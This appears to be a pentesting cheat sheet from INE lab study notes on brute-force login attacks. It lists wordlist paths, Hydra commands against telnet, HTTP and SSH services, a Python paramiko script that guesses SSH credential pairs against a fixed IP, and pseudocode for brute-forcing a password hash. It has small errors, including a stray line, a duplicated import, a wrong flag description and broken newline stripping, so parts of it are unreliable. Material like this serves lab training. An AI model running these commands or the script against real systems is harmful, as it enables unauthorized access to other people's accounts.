🔲Bruteforce Attacks

Bruteforce Wordlists Suggested in INE LABS

USERNAME LIST 1: /usr/share/ncrack/minimal.usr

PASSWORD LIST 1: /usr/share/seclists/Passwords/rockyou-10.txtPASSWORD LIST 2: /usr/share/seclists/Passwords/rockyou-15.txt

Hydra

Attacking telnet service

hydra -L user_list.txt -P password_list.txt telnet://target.server

Attacking http-get service

hydra -L user_list.txt -P password_list.txt http-get://target.server

Attacking ssh service

hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-15.txt ssh://192.168.99.22:22

-l ==> Password string to use
-L ==> Define List of usernames stored in a File
-p ==> Password string to use
-P ==> Define List of passwords stored in a File
telnet:// ==> used for telnet connection
http-get:// ==> used for http-get requests

Bruteforce Scripts

# Quick SSH password Checker

import socket
import ssh2
s
import paramiko
import socket
import time
from colorama import init, Fore

init()

GREEN = Fore.GREEN
RED   = Fore.RED
RESET = Fore.RESET
BLUE  = Fore.BLUE

# Username file
user_file = open("./SSH/recheck_userlist.txt", "r")
user_list = user_file.readlines()
user_file.close()

# Password file
pass_file = open("./SSH/recheck_passlist.txt", "r")
pass_list = pass_file.readlines()
pass_file.close()

# HOST
host = "192.168.99.22"

def is_ssh_open(hostname, username, password):
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to know hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        # sleep for a minute
        time.sleep(60)
        return is_ssh_open(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo: HOSTNAME: {hostname} | USERNAME: {username} | PASSWORD: {password}{RESET}")
        return True

try:
        for user_id in range(len(user_list)):
                is_ssh_open(host, user_list[user_id].replace("\\n",""), pass_list[user_id].replace("\\n", ""))
except KeyboardInterrupt:
        exit()

Basic Bruteforce Algorithm

# ALGORITHM [Bruteforce]

password_found = false
password_length = 1

while password_found == false
do 
	while can_create_password_of_length(password_length)
	do
		password = create_password_of_length(password_length)
		if (hash(password) match attacked_hash)
		then
			password_found = true
	done
	password_length = password_length +1
done